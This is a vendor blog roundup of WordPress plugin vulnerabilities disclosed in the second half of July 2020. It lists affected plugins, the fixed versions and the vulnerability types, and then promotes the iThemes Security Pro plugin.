New WordPress plugin and theme vulnerabilities were disclosed during the second half of July, so we want to keep you aware. In this post, we cover recent WordPress plugin, theme and core vulnerabilities and what to do if you are running one of the vulnerable plugins or themes on your website.
The WordPress Vulnerability Roundup is divided into three different categories:
WordPress Core Vulnerabilities
There have not been any WordPress core vulnerabilities disclosed in the second half of July.
WordPress Plugin Vulnerabilities
1. Wise Chat
Wise Chat versions below 2.8.4 have a CSV Injection vulnerability.
2. Powie’s WHOIS Domain Check
Powie’s WHOIS Domain Check versions below 0.9.33 have an Authenticated Stored Cross-Site Scripting vulnerability.
3. Knight Lab Timeline
Knight Lab Timeline versions below 3.7.0.0 are using an outdated version of the TimelineJS library which could Lead to Stored XSS vulnerability.
4. Page Builder: KingComposer
Page Builder: KingComposer versions below 2.9.5 have an Unauthenticated Reflected Cross-Site Scripting vulnerability.
5. SRS Simple Hits Counter
SRS Simple Hits Counter versions below 1.1.0 have an Unauthenticated Blind SQL Injection vulnerability.
6. WP-Live Chat by 3CX
WP-Live Chat by 3CX versions below 8.2.0 have an Authenticated Stored Cross-Site Scripting vulnerability.
7. Newsletter
Newsletter versions below 6.7.7 have an Authenticated Stored Cross-Site Scripting vulnerability.
8. Form Maker by 10Web
Form Maker by 10Web versions below 1.13.40 have an Authenticated Reflected XSS vulnerability.
9. SendPress Newsletters
SendPress Newsletters versions below 1.20.7.13 have an Authenticated Stored Cross-Site Scripting vulnerability.
10. Email Verification for WooCommerce
Email Verification for WooCommerce versions below 1.8.2 have a Loose Comparison to Authentication Bypass vulnerability.
11. All in One SEO Pack
All in One SEO Pack versions below 3.6.2 have an Authenticated Stored Cross-Site Scripting vulnerability.
12. JobSearch WP Job Board
JobSearch WP Job Board WordPress Plugin versions below 1.5.5 have an Unauthenticated Reflected Cross-Site Scripting vulnerability.
13. Email Subscribers & Newsletters
Email Subscribers & Newsletters versions below 4.5.1 have an Authenticated SQL injection in es_newsletters_settings_callback() and a Cross-site Request Forgery in send_test_email() vulnerabilities.
WordPress Theme Vulnerabilities
There have been no WordPress theme vulnerabilities disclosed in the second half of July.
New! Protect Your WordPress Website with the iThemes Security Site Scan
Every day, it gets harder and harder to keep track of every disclosed WordPress vulnerability. You have to compare that list to the versions of plugins and themes you have installed on your site… and make sure you’re constantly updating.
To solve this problem, the iThemes Security Pro plugin now includes a better way to protect your sites against software vulnerabilities, the number one culprit of hacked and compromised WordPress sites.
The new, improved WordPress Security Site Scan powered by iThemes performs automatic checks for known website vulnerabilities and, if a patch is available, iThemes Security Pro will now automatically apply the fix for you… so you don’t have to. Whew. that’s some peace of mind.
From your WordPress security logs, you can now click the more details link to learn about the vulnerability, including the vulnerable version number, the type of vulnerability, the patched version number, disclosure timeline and more.
A WordPress Security Plugin Can Help Secure Your Website
iThemes Security Pro, our WordPress security plugin, offers 50+ ways to secure and protect your website from common WordPress security vulnerabilities. With WordPress, two-factor authentication, brute force protection, strong password enforcement, and more, you can add an extra layer of security to your website.
The post WordPress Vulnerability Roundup: July 2020, Part 2 appeared first on iThemes.
Source: Security Feed